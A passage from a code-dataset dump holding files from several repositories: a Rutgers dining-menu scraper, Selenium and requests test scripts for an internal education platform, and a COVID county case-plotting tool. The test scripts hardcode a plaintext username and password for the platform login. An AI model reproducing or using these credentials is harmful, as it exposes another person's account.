"content_id": "495970ee03298f4e45ae15799747c64dfe258833",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 571,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 42,
"path": "/README.md",
"repo_name": "dbordak/RU-Food-Scraper",
"src_encoding": "UTF-8",
"text": "#Rutgers Nutritional Information Scraper\n\nScrapes food.rutgers.edu for menus and nutritional information, saves to file.\n\n###Format\n\n```\n{\n\tBrower Commons : {\n\t\tBreakfast : [\n\t\t\t{\n\t\t\t\tname : 'ITEM NAME',\n\t\t\t\tserving : 'SERVING SIZE',\n\t\t\t\tcalories : 100,\n\t\t\t\tingredients : 'INGREDIENT1, INGREDIENT2, ...'\n\t\t\t},\n\t\t\t{\n\t\t\t\t...\n\t\t\t},\n\t\t\t...\n\t\t],\n\t\tLunch : [\n\t\t\t...\n\t\t],\n\t\tDinner : [\n\t\t\t...\n\t\t]\n\t},\n\tBusch Dining Hall : {\n\t\t...\n\t},\n\tNeilson Dining Hall : {\n\t\t...\n\t},\n\tLivingston Dining Commons : {\n\t\t...\n\t}\n}\n```\n\n###Dependencies\nPython script requires package `BeautifulSoup`."
},
{
"alpha_fraction": 0.6700796484947205,
"alphanum_fraction": 0.6750094890594482,
"avg_line_length": 30.39285659790039,
"blob_id": "0849bea5dcc6798f29f10cd3a1598ec8b886cbe0",
"content_id": "52f9987e2b45c5626f0796c5afc5bc0af863393b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2637,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 84,
"path": "/scrape.py",
"repo_name": "dbordak/RU-Food-Scraper",
"src_encoding": "UTF-8",
"text": "#!/bin/python\nfrom bs4 import BeautifulSoup\nfrom re import compile\ntry:\n\tfrom urllib2 import urlopen\nexcept:\n\tfrom urllib.request import urlopen\nimport json\nfrom sys import stdout\nfrom argparse import ArgumentParser, FileType\n\nparser = ArgumentParser(prog='RU Food Scraper', description='Scrape the Rutgers' +\n 'Dining Website for nutritional information\\n' +\n 'Prints output as json.')\nparser.add_argument('outfile', nargs='?', type=FileType('w'), default=stdout,\n help=\"Output file (defaults to stdout).\")\nparser.add_argument('--fancy', dest='fancy', action='store_true', default=False)\nargs = parser.parse_args()\n\ningredientSplit = compile(r'(?:[^,(]|\\([^)]*\\))+')\nURL_PREFIX = \"http://menuportal.dining.rutgers.edu/foodpro/\"\n\ndef scrapeNutritionReport(url):\n\t\"\"\"Scrapes a Nutrition Report page, returns name, serving, calories, ingredients\"\"\"\n\tpage = urlopen(url).read()\n\tsoup = BeautifulSoup(page)\n\tret = {}\n\n\t# Get item name\n\ttry:\n\t\tret['name'] = soup.find(id=\"content-text\").find_all(\"h2\")[1].string\n\texcept AttributeError:\n\t\tpass\n\n\t# Get serving size\n\ttry:\n\t\tret['serving'] = soup.find(id=\"facts\").find(\"p\", \"\").string[len(\"Serving Size \"):]\n\texcept AttributeError:\n\t\tpass\n\n\t# Get calorie count.\n\ttry:\n\t\tret['calories'] = int(soup.find(id=\"facts\").find(\"p\", \"strong\").string[len(\"Calories \"):])\n\texcept AttributeError:\n\t\tpass\n\n\t# Get ingredient list\n\ttry:\n\t\te = soup.find(text=compile(\"INGREDIENTS\")).parent\n\t\tp = e.parent\n\t\te.decompose()\n\t\tret['ingredients'] = [ing.strip() for ing in ingredientSplit.findall(p.string)]\n\texcept AttributeError:\n\t\tpass\n\n\treturn ret\n\ndef scrapeMeal(url):\n\t\"\"\"Parses meal, calls for scraping of each nutrition facts\"\"\"\n\tpage = urlopen(url).read()\n\tsoup = BeautifulSoup(page)\n\tsoup.prettify()\n\treturn [scrapeNutritionReport(URL_PREFIX + link['href']) for link in\n\t soup.find(\"div\", \"menuBox\").find_all(\"a\", href=True)]\n\ndef scrapeCampus(url):\n\t\"\"\"Calls for the scraping of the meals of a campus\"\"\"\n\t# TODO: Add takeout?\n\tmeals = ('Breakfast', 'Lunch', 'Dinner')\n\treturn {meal: scrapeMeal(url + \"&mealName=\" + meal) for meal in meals}\n\ndef scrape():\n\t\"\"\"Calls for the scraping of the menus of each campus\"\"\"\n\tprefix = URL_PREFIX + \"pickmenu.asp?locationNum=0\"\n\t# There doesn't seem to be a hall #2\n\thalls = (('Brower Commons', '1'), ('Livingston Dining Commons', '3'),\n\t ('Busch Dining Hall', '4'), ('Neilson Dining Hall', '5'))\n\treturn {hall[0]: scrapeCampus(prefix + hall[1]) for hall in halls}\n\nif args.fancy:\n\tjson.dump(scrape(), args.outfile, indent=1)\nelse:\n\tjson.dump(scrape(), args.outfile)\nargs.outfile.close()\n"
}
] | 2 |
casteller/ccedu | https://github.com/casteller/ccedu | e1eb12356fba4367d66f89bd416000623dd0fed0 | e80ff5e9c071293ce6ba66597acaa32c632b69d4 | d6bbce9cfebbf02b5289b2d67a8917173e6f6cf4 | refs/heads/master | 2020-06-26T06:44:42.029583 | 2020-04-02T02:35:31 | 2020-04-02T02:35:31 | 199,562,430 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5916877388954163,
"alphanum_fraction": 0.6046054363250732,
"avg_line_length": 49.63768005371094,
"blob_id": "d20615b82cabf5ee5bb4e8e100ce84adbd6c6440",
"content_id": "574ed1d9caf0f8f03ab68fe2d109c72d473e0290",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3639,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 69,
"path": "/test/pylib/webLib.py",
"repo_name": "casteller/ccedu",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\r\nfrom cfg import *\r\nfrom selenium import webdriver\r\nimport time\r\nfrom selenium.webdriver import ActionChains\r\nclass webLib(object):\r\n ROBOT_LIBRARY_SCOPE = 'GLOBAL'\r\n def __init__(self):\r\n pass\r\n #打开浏览器\r\n def open_browser(self):\r\n self.wd = webdriver.Chrome()\r\n self.wd.maximize_window()\r\n self.wd.implicitly_wait(10)\r\n #关闭浏览器\r\n def close_browser(self):\r\n self.wd.quit()\r\n #登录\r\n def login(self,username,password):\r\n self.wd.get(loginurl)\r\n self.wd.find_element_by_name(\"username\").send_keys(username)\r\n self.wd.find_element_by_name(\"password\").send_keys(password)\r\n self.wd.find_element_by_xpath(\"//button\").click()\r\n #切换到后台管理\r\n def changeback(self):\r\n self.wd.find_element_by_xpath(\"//div[@class='edu-header-user']\").click()\r\n self.wd.find_element_by_xpath(\"//div[@class='edu-header-user']//li[1]\").click()\r\n\r\n #添加老师\r\n def addteacher(self):\r\n self.wd.find_element_by_xpath(\"//ul[contains(@class,'main')]/li[3]//div/span\").click()\r\n self.wd.find_element_by_xpath(\"//ul[contains(@class,'main')]/li[3]//ul//span\").click()\r\n time.sleep(2)\r\n self.wd.find_element_by_xpath(\"//div[@ng-controller='lecturerListController']//div[2]/button[1]\").click()\r\n self.wd.find_element_by_xpath(\"//div/input[@ng-model='lecturer.name']\").send_keys(\"李睿\")\r\n time.sleep(2)\r\n self.wd.find_element_by_xpath(\"//div/span[@ng-click='selectCompany()']\").click()\r\n self.wd.find_element_by_xpath(\"//div[@class='box-tree']\").click()\r\n time.sleep(1)\r\n self.wd.find_element_by_xpath(\"//div/button[@ng-click='ok()']\").click()\r\n self.wd.find_element_by_xpath(\"//div/input[@ng-model='lecturer.position']\").send_keys(\"物理老师\")\r\n self.wd.find_element_by_xpath(\"//div/input[@ng-model='lecturer.masterCourse']\").send_keys(\"物理\")\r\n self.wd.find_element_by_xpath(\"//div/input[@ng-model='lecturer.mobile']\").send_keys(\"15928604750\")\r\n self.wd.find_element_by_xpath(\"//div/input[@ng-model='lecturer.phone']\").send_keys(\"02882777172\")\r\n self.wd.find_element_by_xpath(\"//div/input[@ng-model='lecturer.email']\").send_keys(\"[email protected]\")\r\n self.wd.find_element_by_xpath(\"//div/textarea[@ng-model='lecturer.introduction']\").send_keys(\"资深物理老师\")\r\n self.wd.find_element_by_xpath(\"//div/button[@ng-click='save()']\").click()\r\n #添加课件\r\n def addkejian(self):\r\n self.wd.find_element_by_xpath(\"//ul[contains(@class,'main')]/li[6]//div/span\").click()\r\n self.wd.find_element_by_xpath(\"//ul[contains(@class,'main')]/li[6]//ul[1]//li[1]//span\").click()\r\n time.sleep(2)\r\n self.wd.find_element_by_xpath(\"//div[@ng-controller='coursewareListController']//div[2]/button[1]\").click()\r\n self.wd.find_element_by_xpath(\"//div/input[@ng-model='courseware.name']\").send_keys(\"课件名称\")\r\n time.sleep(1)\r\n self.wd.find_element_by_xpath(\"//div[@ng-model='courseware.specialty']\").click()\r\n self.wd.find_element_by_xpath(\"//div[@ng-model='courseware.specialty']//ul//li//div[3]/a\").click()\r\n self.wd.find_element_by_xpath(\"//div/textarea[@ng-model='courseware.explain']\").send_keys(\"课件简介\")\r\n self.wd.find_element_by_xpath(\"//div/button[@ng-click='save()']\").click()\r\n self.wd.find_element_by_xpath(\"//div/button[@ng-click='back()']\").click()\r\n\r\nif __name__ == '__main__':\r\n op = webLib()\r\n op.open_browser()\r\n op.login(\"zhangqingqin\",\"tfwsdx@2019\")\r\n op.changeback()\r\n op.addteacher()\r\n # op.addteacher()\r\n # op.addkejian()"
},
{
"alpha_fraction": 0.4794520437717438,
"alphanum_fraction": 0.6712328791618347,
"avg_line_length": 34.5,
"blob_id": "0e7fdc72d01d6a362cc9daee2ff2d2bd44a54c50",
"content_id": "d09d3eb58e74f45492d230246e4bc7600393ec4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 73,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 2,
"path": "/test/cfg.py",
"repo_name": "casteller/ccedu",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\r\nloginurl = \"http://10.206.1.168:8084/ccsedu/a/login.do\"\r\n"
},
{
"alpha_fraction": 0.5766847133636475,
"alphanum_fraction": 0.5917893052101135,
"avg_line_length": 41.344261169433594,
"blob_id": "2dc4d5555d7c4e14efed1c9960fcac596d6af205",
"content_id": "ddc2ce61574849490e5e496d7b4a3d982e4f871e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2698,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 61,
"path": "/test/pylib/studyLib.py",
"repo_name": "casteller/ccedu",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\nimport requests,json,time\nfrom pprint import pprint\nclass studyLib(object):\n ip = \"10.206.1.168:8084\"\n time = time.strftime(\"%Y-%m-%d\", time.localtime())\n def header(self):\n headers = {\n 'Host': studyLib.ip,\n 'Cookie':'APP_SESSIONID='+cookies,\n 'Connection': 'keep-alive',\n 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8'\n }\n return headers\n #获取cookies\n def get_cookie(self):\n session = requests.Session()\n url = \"http://\"+self.ip+\"/ccsedu/a/login.do\"\n payload = {'args': None, 'usertype':2, 'username':'zhangqingqin', 'password':'tfwsdx@2019'}\n session.post(url,data=payload)\n s = session.cookies.get_dict()\n print(s['APP_SESSIONID'])\n return s['APP_SESSIONID']\n #添加老师\n def addteacher(self,name,masterCourse,externalUnit,position):\n url = \"http://\"+studyLib.ip+\"/ccsedu/a/js/jsgl/saveLecturer \"\n payload = {'name':name,'sex':1,'levels':1,'type':2,'masterCourse':masterCourse,'externalUnit':externalUnit,'position':position}\n res = requests.post(url,data=payload,headers=SL.header())\n print(res.json())\n #添加课件\n def addkejian(self,name,explain,specialty):\n url = \"http://\"+studyLib.ip+\"/ccsedu/a/kc/kjgl/saveCourseware\"\n payload = {'name':name,'explain':explain,'specialty':specialty,'corpId':510101,'deptId':51000005,'createBy':89787,'createDate':studyLib.time}\n r = requests.post(url,data=payload,headers=SL.header())\n print(r.json())\n #试题呈报\n def submit(self,id):\n url = \"http://\"+studyLib.ip+\"/ccsedu/a/ks/tkgl/reportQuestion\"\n payload = {'id': id}\n r = requests.post(url, data=payload, headers=SL.header())\n print(r.json())\n #试题审核\n def audit(self, id):\n url = \"http://\"+studyLib.ip+\"/ccsedu/a/ks/tkgl/auditQuestion\"\n payload = {'id': id}\n r = requests.post(url, data=payload, headers=SL.header())\n print(r.json()['msg'])\nif __name__ == '__main__':\n SL = studyLib()\n cookies = SL.get_cookie()\n # res = SL.addteacher(\"李睿\",'数学','未知机构','职务数学老师')\n # re = SL.addkejian(\"测试添加课件\",\"测试课件简介\",1)\n # with open(r'C:\\Users\\Administrator\\Desktop\\ksid.txt','r')as f:\n # ids = f.read().splitlines()\n # for id in ids:\n # SL.audit(id)\n # with open(r'C:\\Users\\Administrator\\Desktop\\username.txt', 'r')as f:\n # users = f.read().splitlines()\n # for user in users:\n # SL.get_cookie(user)\n SL.addteacher(\"李睿\", '数学', '未知机构', '职务数学老师')"
}
] | 3 |
AndreasPr/Python-Longest-Substring-Without-Repeating-Chars | https://github.com/AndreasPr/Python-Longest-Substring-Without-Repeating-Chars | a2f94e287adbba44979091e7258d824868865823 | 72945530826acafacbe82607432c36029db5724a | de25cfee581b0c56026d44b0ee4eeeab5693adaa | refs/heads/master | 2023-04-11T20:02:39.436353 | 2021-05-02T12:26:02 | 2021-05-02T12:26:02 | 310,864,791 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6284953355789185,
"alphanum_fraction": 0.6311584711074829,
"avg_line_length": 27.884614944458008,
"blob_id": "c9455764f5144f429eaec56fefa6d570753bcca1",
"content_id": "88ad793d4d75cd55f135fc6b8fac89959569d4c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 751,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 26,
"path": "/index.py",
"repo_name": "AndreasPr/Python-Longest-Substring-Without-Repeating-Chars",
"src_encoding": "UTF-8",
"text": "def lengthOfLongestSubstring(s):\n lengthOfSubstring = len(s)\n result = 0\n for i in range(0, lengthOfSubstring):\n for j in range(i, lengthOfSubstring):\n if(isUnique(s, i, j)):\n result = max(result, j - i)\n\n return result\n\ndef isUnique(s, start, end):\n setOfStrings = set()\n for i in range(start, end):\n character = s[i]\n if(character in setOfStrings):\n return False\n setOfStrings.add(character)\n\n return True\n\nif __name__ == '__main__':\n stringInput = \"pwwkew\"\n print(f\"Input value: {stringInput}\")\n\n answerForLength = lengthOfLongestSubstring(stringInput)\n print(f\"The length of the longest substring without repeating characters is {answerForLength}\")\n"
},
{
"alpha_fraction": 0.8533333539962769,
"alphanum_fraction": 0.8533333539962769,
"avg_line_length": 24,
"blob_id": "767bb3231cbb321aba92baf53b3c79589df8b1ae",
"content_id": "df022270cc99ee413e52ce32222318879dd108a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 75,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 3,
"path": "/README.md",
"repo_name": "AndreasPr/Python-Longest-Substring-Without-Repeating-Chars",
"src_encoding": "UTF-8",
"text": "# Longest Substring Without Repeating Characters\n\nImplementation in Python\n"
}
] | 2 |
acoastalfog/covid-county-plotter | https://github.com/acoastalfog/covid-county-plotter | 327c5a6155d178b889fd656daa3a82f2bd100c32 | 3868a42e1852bac790ab1cec1af62b03b256bfec | 14cd3181fd80adfade5520443dfa91148f87680f | refs/heads/master | 2023-07-17T23:12:10.468850 | 2021-09-06T02:10:18 | 2021-09-06T02:10:18 | 258,795,685 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7612903118133545,
"alphanum_fraction": 0.7623655796051025,
"avg_line_length": 41.272727966308594,
"blob_id": "6867baa190f3a3b982f91382d3f8a5ffde85ddd7",
"content_id": "e266578e5909d44133d4572115e7236b33caec74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 930,
"license_type": "no_license",
"max_line_length": 253,
"num_lines": 22,
"path": "/README.md",
"repo_name": "acoastalfog/covid-county-plotter",
"src_encoding": "UTF-8",
"text": "# COVID County Plotter\n\nI was frustrated that simple visual time series plots of county-level COVID data seemed to be hard to come by, so I wrote a simple, poorly-engineered, quick and dirty script to plot what I wanted to see. It only has one feature and only makes one chart.\n\nIt's pretty easy to use.\n\n```python\nimport county_plotter as cp\n\nwestchester = cp.countyDataPlotter (\"Westchester\", \"New York\", \"JHU\")\nwestchester.plotCasesAndDeathsTwoPanes (7)\n```\n\nTakes county and state, and then you can select between the JHU or NYT live github data. JHU tends to be ahead. Parameter passed to the plotting function is the moving window size. And it just writes to a fixed format ```images``` folder.\n\nIt's all very hacky.\n\nIf you want to add a new plot or feature, please feel free to throw me a PR.\n\nHere's an example of the only thing it does for my home county of Rockland. Doing pretty well!\n\n\n"
},
{
"alpha_fraction": 0.6018962860107422,
"alphanum_fraction": 0.6185164451599121,
"avg_line_length": 42.096153259277344,
"blob_id": "366e67b35e4edab81c740ad0bbe4292496a36b11",
"content_id": "bf63220c5eeeb52d5f8a5d8d3f8d91cdbb50db72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8965,
"license_type": "no_license",
"max_line_length": 221,
"num_lines": 208,
"path": "/county_plotter.py",
"repo_name": "acoastalfog/covid-county-plotter",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env/python\n\nimport os\nimport sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\n\nfrom mpl_toolkits.axes_grid.inset_locator import (inset_axes, InsetPosition, mark_inset)\n\nclass countyDataPlotter:\n def __init__ (self, county, state, dataType, insertType = None):\n\n # County, state, and data type are static per instantiation\n self.county = county\n self.state = state\n self.dataType = dataType\n self.insertType = insertType\n\n # Data type readers just grab lists of dates, cases, and deaths. Preprocessing in __init__\n if self.dataType == \"NYT\":\n readFunction = self.readNYTData\n elif self.dataType == \"JHU\":\n readFunction = self.readJHUData\n else:\n print (\"Unknown data type, options are 'NYT' or 'JHU'.\")\n sys.exit ()\n\n # Should assert\n if self.insertType:\n if self.insertType == \"right\" or self.insertType == \"left\":\n pass\n else:\n print (\"Unknown insert type, options are 'right' or 'left'.\")\n sys.exit ()\n \n # Read data\n self.dates, self.cumulativeCases, self.cumulativeDeaths = readFunction ()\n\n # Compute date limits (future: adjustable) \n self.dateLims = [self.dates[0], self.dates[-1]]\n \n # Compute daily cases from cumulatives\n self.dailyCases = [self.cumulativeCases[0]]\n self.dailyDeaths = [self.cumulativeDeaths[0]]\n for i in range(1, len(self.cumulativeCases)):\n self.dailyCases.append(self.cumulativeCases[i] - self.cumulativeCases[i - 1])\n self.dailyDeaths.append(self.cumulativeDeaths[i] - self.cumulativeDeaths[i - 1])\n\n def readNYTData (self):\n usCounties = pd.read_csv(\"https://github.com/nytimes/covid-19-data/raw/master/us-counties.csv\")\n countyData = usCounties[(usCounties.state == self.state) & \\\n (usCounties.county == self.county)].reset_index()\n\n dates = countyData['date'].tolist()\n dates = [dt.datetime.strptime(date, '%Y-%m-%d').date() for date in dates]\n\n cumulativeCases = countyData['cases'].tolist()\n cumulativeDeaths = countyData['deaths'].tolist()\n\n return dates, cumulativeCases, cumulativeDeaths\n\n def readJHUData (self):\n usCases = pd.read_csv(\"https://github.com/CSSEGISandData/COVID-19/raw/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_US.csv\")\n usDeaths = pd.read_csv(\"https://github.com/CSSEGISandData/COVID-19/raw/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_US.csv\") \n\n countyCases = usCases[(usCases.Province_State == self.state) & \\\n (usCases.Admin2 == self.county)].reset_index()\n countyDeaths = usDeaths[(usDeaths.Province_State == self.state) & \\\n (usDeaths.Admin2 == self.county)].reset_index()\n\n # Return cumulative case list, find first non-zero index\n # Deaths from JHU have one extra field, so offset the cumulative data in place\n nonZeroIndex = np.nonzero(countyCases.values.tolist()[0][12:])[0][0] + 12\n cumulativeCases = countyCases.values.tolist()[0][nonZeroIndex:]\n cumulativeDeaths = countyDeaths.values.tolist()[0][nonZeroIndex + 1:]\n\n dates = list(countyCases)[nonZeroIndex:]\n dates = [dt.datetime.strptime(date, '%m/%d/%y').date() for date in dates]\n\n return dates, cumulativeCases, cumulativeDeaths\n\n def convolutionMovingAverage (self, data, window):\n weights = np.repeat(1.0, window) / window\n dataExtension = np.hstack([[0] * (window - 1), data])\n\n # This is a bit of a hack. Just screw around with the convolution window to fit depending on the window size.\n\n dataMovingAverage = \\\n np.convolve(dataExtension, weights)[window + (window - 8): -(window - (window - 6))]\n\n return dataMovingAverage \n\n def setTwoPaneFormatPerPane (self, ax, axDaily):\n # Will use these to smooth out the x data for any called county\n locator = mdates.AutoDateLocator(maxticks = 10)\n formatter = mdates.ConciseDateFormatter(locator)\n\n # Ensure cumulative curve sits on top of secondary cutve\n ax.set_zorder(10)\n ax.patch.set_visible(False)\n\n ax.set_ylim(bottom=0)\n\n ax.tick_params(labelsize=8)\n\n # Apply formatting after second axis\n axDaily.xaxis.set_major_locator(locator)\n axDaily.xaxis.set_major_formatter(formatter)\n \n # Only need to set the xlim on the second axis\n axDaily.set_xlim(self.dateLims)\n \n # NYTimes data is sometimes a little ridiculous\n axDaily.set_ylim(bottom=0)\n\n axDaily.tick_params(labelsize=8)\n \n def plotCasesAndDeathsTwoPanes (self, window):\n # Compute the moving average but just don't just truncate\n dailyCasesMovingAverage = self.convolutionMovingAverage(self.dailyCases, window)\n dailyDeathsMovingAverage = self.convolutionMovingAverage(self.dailyDeaths, window)\n\n # Start figure\n fig, ax = plt.subplots(2, 1, constrained_layout = True, figsize = (5, 6), dpi=300)\n ax[0].plot(self.dates, self.cumulativeCases, '-', c='blue', lw=1.5)\n ax[0].plot(self.dates, self.cumulativeCases, '.', c='blue', lw=1.5)\n\n ax[0].set_title(self.county + \", \" + self.state + \" Cumulative Cases and Cases/Day\", fontsize = 8)\n ax[0].set_ylabel(\"Cumulative Cases\", fontsize = 8)\n \n axDaily0 = ax[0].twinx()\n axDaily0.bar(self.dates, self.dailyCases, color='orange', align='edge')\n axDaily0.plot(self.dates, dailyCasesMovingAverage, c='grey')\n\n axDaily0.set_ylabel(\"Daily Cases\", fontsize=8)\n\n # Custom legend\n convolutionLabel = str(window) + \" Day Convolution\"\n legendElements = [matplotlib.lines.Line2D([0], [0], color='b', marker='.', lw=1.5, label='Cumulative Cases'), \\\n matplotlib.lines.Line2D([0], [0], color='grey', lw=1.5, label=convolutionLabel)]\n ax[0].legend(handles=legendElements, loc=2, fontsize=8)\n\n # Common pane format options\n self.setTwoPaneFormatPerPane(ax[0], axDaily0)\n\n if self.insertType:\n # Optional inset with log daily data\n axInset = plt.axes([0, 0, 1, 1])\n\n if self.insertType == 'right':\n ip = InsetPosition(ax[0], [0.40, 0.25, 0.4, 0.4])\n elif self.insertType == 'left':\n print (\"'left' is not actually supported\")\n sys.exit()\n axInset.set_axes_locator(ip)\n\n axInset.bar(self.dates[-30:], self.dailyCases[-30:], color='orange', align='edge')\n axInset.plot(self.dates[-30:], dailyCasesMovingAverage[-30:], c='grey')\n\n # Will use these to smooth out the x data for any called county\n locator = mdates.AutoDateLocator(maxticks = 6)\n formatter = mdates.ConciseDateFormatter(locator)\n\n # Apply formatting after second axis\n axInset.xaxis.set_major_locator(locator)\n axInset.xaxis.set_major_formatter(formatter)\n \n # Only need to set the xlim on the second axis\n newDateLims = [self.dates[-30], self.dates[-1]]\n axInset.set_xlim(newDateLims)\n \n # NYTimes data is sometimes a little ridiculous\n axInset.set_ylim(bottom=0)\n\n axInset.tick_params(labelsize=8)\n\n # Ax[1] is deaths\n ax[1].plot(self.dates, self.cumulativeDeaths, '-', c='blue', lw=1.5)\n ax[1].plot(self.dates, self.cumulativeDeaths, '.', c='blue', lw=1.5)\n\n ax[1].set_title(self.county + \", \" + self.state + \" Cumulative Deaths and Deaths/Day\", fontsize=8)\n ax[1].set_ylabel(\"Cumulative Deaths\", fontsize=8)\n \n axDaily1 = ax[1].twinx()\n axDaily1.bar(self.dates, self.dailyDeaths, color='orange', align='edge')\n axDaily1.plot(self.dates, dailyDeathsMovingAverage, c='grey')\n\n axDaily1.set_ylabel(\"Daily Deaths\", fontsize=8)\n \n # Custom legend\n convolutionLabel = str(window) + \" Day Convolution\"\n legendElements = [matplotlib.lines.Line2D([0], [0], color='b', marker='.', lw=1.5, label='Cumulative Deaths'), matplotlib.lines.Line2D([0], [0], color='grey', lw=1.5, label=convolutionLabel)]\n ax[1].legend(handles=legendElements, fontsize=8)\n\n # Common pane format options\n self.setTwoPaneFormatPerPane(ax[1], axDaily1)\n\n \n # Save a figure\n if not os.path.exists('images'):\n os.makedirs('images')\n\n nameOfFigure = 'images/' + self.county + \"-\" + self.state + \"-\" + self.dataType + \".png\"\n plt.savefig(nameOfFigure)\n\n"
},
{
"alpha_fraction": 0.7486772537231445,
"alphanum_fraction": 0.7574955821037292,
"avg_line_length": 33.3636360168457,
"blob_id": "0387e19e6de57ad429435248ea5918181582b800",
"content_id": "c14cc2db187dade5d2175f2971139542a71c671c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1134,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 33,
"path": "/county_caller.py",
"repo_name": "acoastalfog/covid-county-plotter",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env\n\nimport county_plotter as cp\n\nrocklandJHU = cp.countyDataPlotter (\"Rockland\", \"New York\", \"JHU\")\nrocklandJHU.plotCasesAndDeathsTwoPanes (7)\n\nhenricoJHU = cp.countyDataPlotter (\"Henrico\", \"Virginia\", \"JHU\")\nhenricoJHU.plotCasesAndDeathsTwoPanes (7)\n\nknoxJHU = cp.countyDataPlotter (\"Knox\", \"Tennessee\", \"JHU\")\nknoxJHU.plotCasesAndDeathsTwoPanes (7)\n\n#washingtonJHU = cp.countyDataPlotter (\"Washington\", \"Oregon\", \"JHU\")\n#washingtonJHU.plotCasesAndDeathsTwoPanes (7)\n#\n#lickingJHU = cp.countyDataPlotter (\"Licking\", \"Ohio\", \"JHU\")\n#lickingJHU.plotCasesAndDeathsTwoPanes (7)\n#\n#dupageJHU = cp.countyDataPlotter (\"DuPage\", \"Illinois\", \"JHU\")\n#dupageJHU.plotCasesAndDeathsTwoPanes (7)\n#\n#cookJHU = cp.countyDataPlotter (\"Cook\", \"Illinois\", \"JHU\")\n#cookJHU.plotCasesAndDeathsTwoPanes (7)\n#\n#deschutesJHU = cp.countyDataPlotter (\"Deschutes\", \"Oregon\", \"JHU\")\n#deschutesJHU.plotCasesAndDeathsTwoPanes (7)\n#\n#delawareJHU = cp.countyDataPlotter (\"Delaware\", \"New York\", \"JHU\")\n#delawareJHU.plotCasesAndDeathsTwoPanes (7)\n#\n#otsegoJHU = cp.countyDataPlotter (\"Otsego\", \"New York\", \"JHU\")\n#otsegoJHU.plotCasesAndDeathsTwoPanes (7)\n"
}
] | 3 |
Siddhant111/Capstone-Django | https://github.com/Siddhant111/Capstone-Django | 8f671f72c2dedcf84661b2031c28a01d8f5e5078 | 08297910b056510e612d0af8c9adfdbba29dd1d4 | 46b8e90e70f35a0230c23d9fe6276b7b59e227d2 | refs/heads/master | 2022-12-15T13:15:59.412610 | 2019-11-14T19:45:38 | 2019-11-14T19:45:38 | 220,622,954 | 0 | 2 | null | 2019-11-09T09:56:54 | 2019-11-14T19:46:13 | 2021-03-31T21:33:06 | Python | [
{
"alpha_fraction": 0.7281106114387512,
"alphanum_fraction": 0.7281106114387512,
"avg_line_length": 32.38461685180664,
"blob_id": "a845ab6c22c3e33bd8c1b817247b10b23e6c7030",
"content_id": "0c28ff31ed173a7b5063f7658faea20baa54367d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 434,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 13,
"path": "/target/dist/capstone-django-1.0.dev0/build/lib/capstone/diagnostic/views.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nimport os\n\nfrom django.core.files.storage import FileSystemStorage\nfrom django.conf import settings\n\n# Create your views here.\n\ndef diagnostic(request):\n if request.method == 'POST':\n file_path = os.path.join(settings.BASE_DIR, 'models\\\\research\\\\object_detection')\n os.system('python ' + file_path + '\\\\object_detection_tutorial.py')\n return render(request, 'diagnostic.html')\n"
},
{
"alpha_fraction": 0.5468212962150574,
"alphanum_fraction": 0.5528350472450256,
"avg_line_length": 47,
"blob_id": "fc00bd02fe68cb1e3ff40b6e708dce1f0877ee51",
"content_id": "60a5901d763814d2b5d21d434bdd2ff7ba0cf0a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 4656,
"license_type": "no_license",
"max_line_length": 228,
"num_lines": 97,
"path": "/target/dist/capstone-django-1.0.dev0/build/lib/capstone/preventative/views.py",
"repo_name": "Siddhant111/Capstone-Django",
"src_encoding": "UTF-8",
